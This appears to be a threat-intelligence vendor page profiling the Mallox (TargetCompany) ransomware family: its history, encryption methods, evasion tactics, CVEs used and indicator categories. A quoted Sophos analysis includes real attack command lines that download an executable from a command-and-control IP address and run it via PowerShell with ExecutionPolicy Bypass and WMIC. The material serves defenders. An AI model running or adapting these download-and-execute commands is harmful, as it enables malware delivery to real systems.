Mallox, also known as TargetCompany, Fargo, Tohnichi, and later Xollam in some reporting, is a ransomware family first observed in 2021 that has evolved through multiple naming conventions and operational updates. It is associated with financially motivated extortion activity and has used double-extortion tactics, combining file encryption with theft and threatened publication of victim data.
The malware has historically targeted Windows environments and was initially linked to compromises involving vulnerable Microsoft SQL Server instances. Later activity showed a shift in some campaigns toward spam-delivered malicious Microsoft OneNote attachments. The family has also expanded to Linux, including a variant targeting VMware ESXi environments. Reported victimology includes organizations in East Asia and a broader set of enterprise targets across sectors.
On Windows, Mallox prepares systems for encryption by deleting shadow copies, modifying boot recovery settings, and terminating processes that may lock valuable files, particularly database-related services. It has been reported to enumerate logical drives and encrypt fixed, removable, and network-accessible storage while avoiding some folders and file types needed to keep the system operational. The ransomware drops ransom notes in affected locations and has used varying victim- or campaign-specific encrypted-file extensions over time.
Mallox encrypts files with ChaCha20 and protects per-file key material using Curve25519 and AES-128. Multiple reports also describe defense-evasion tradecraft including reflective loading, PowerShell-based in-memory execution, disabling or uninstalling security tools, and use of auxiliary tooling to terminate protective processes and services. Some operations linked to the family have included deployment of additional malware such as backdoors during intrusion activity.
The group behind Mallox has been observed evolving toward an affiliate-based extortion model, with indications of ransomware-as-a-service style recruitment. A free decryptor has been made available for some cases, indicating that recovery may be possible under limited circumstances for certain victims.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
At the beginning of 2022, SophosLabs and Sophos MTR had been investigating an uptick in reports of attacks against Microsoft SQL Server installations, using two venerable and long-patched remote code execution vulnerabilities (CVE-2019-1068, CVE-2020-0618).
At the beginning of 2022, SophosLabs and Sophos MTR had been investigating an uptick in reports of attacks against Microsoft SQL Server installations, using two venerable and long-patched remote code execution vulnerabilities (CVE-2019-1068, CVE-2020-0618).
10 distinct techniques documented for this family, organized by ATT&CK tactic.
At the beginning of 2022, SophosLabs and Sophos MTR had been investigating an uptick in reports of attacks against Microsoft SQL Server installations, using two venerable and long-patched remote code execution vulnerabilities (CVE-2019-1068, CVE-2020-0618).
... & powershell -ExecutionPolicy Bypass %temp%\update.ps1 & WMIC process call create "%TEMP%\M0QW5DJ1.exe"
"C:\Windows\system32\cmd.exe" /c "echo $client = New-Object System.Net.WebClient > %TEMP%\update.ps1 & echo $client.DownloadFile("http://C2_Server_IP/- malware.exe","%TEMP%\<random>.exe") >> %TEMP%\update.ps1 & powershell – ExecutionPolicy Bypass %temp%\update.ps1 & WMIC process call create "%TEMP%\<random>.exe""
"C:\WINDOWS\system32\cmd.exe" /c "echo $client = New-Object System.Net.WebClient > %TEMP%\update.ps1 & echo $client.DownloadFile("http://91[.]243[.]44[.]142/pl- Ukxamliyg.exe","%TEMP%\9ETVCRZF.exe") >> %TEMP%\update.ps1 & powershell – ExecutionPolicy Bypass %temp%\update.ps1 & WMIC process call create "%TEMP%\9ETVCRZF.exe""
MTR’s investigation found very simple scripts that reach out to the download server, download the next-stage component, and execute it: $client = New-Object System.Net.WebClient $client.DownloadFile("http://91[.]243[.]44[.]142/arx-Ikrbwika.exe","C:\Users\MSSQL$~1\AppData\Local\Temp\VKDA55H6.exe")
These attacks leverage Remcos (a commercially available remote access trojan) and deploy various families of ransomware including TargetCompany, aka Mallox; GlobeImposter, aka Alpha865qqz; and BlueSky.
It then creates the ransom note shown in Figure 20. Note the use of the China.Helper@aol.com address, which we also saw in the instance of the “real” GlobeImposter infection discussed above. | kill$.exe drops a batch file into %TEMP%. Interestingly, this file contains comment strings in Chinese
8 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Ransomware that encrypts files and demands payment for decryption.
Ransomware family that encrypts files and demands payment for decryption, recently expanded to target Linux and VMware ESXi environments, using custom scripts for privilege escalation and data exfiltration.
A ransomware family known for appending victim-specific file extensions, evolving variants, double-extortion operations, and shifting from MS SQL Server exploitation to newer delivery methods such as OneNote-based phishing.
Ransomware that encrypts files, appends extensions such as .mallox, .exploit, .architek, or .brg, removes shadow copies, kills processes that may keep valuable files open, and drops a ransom note named "HOW TO RECOVER !!.TXT".
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.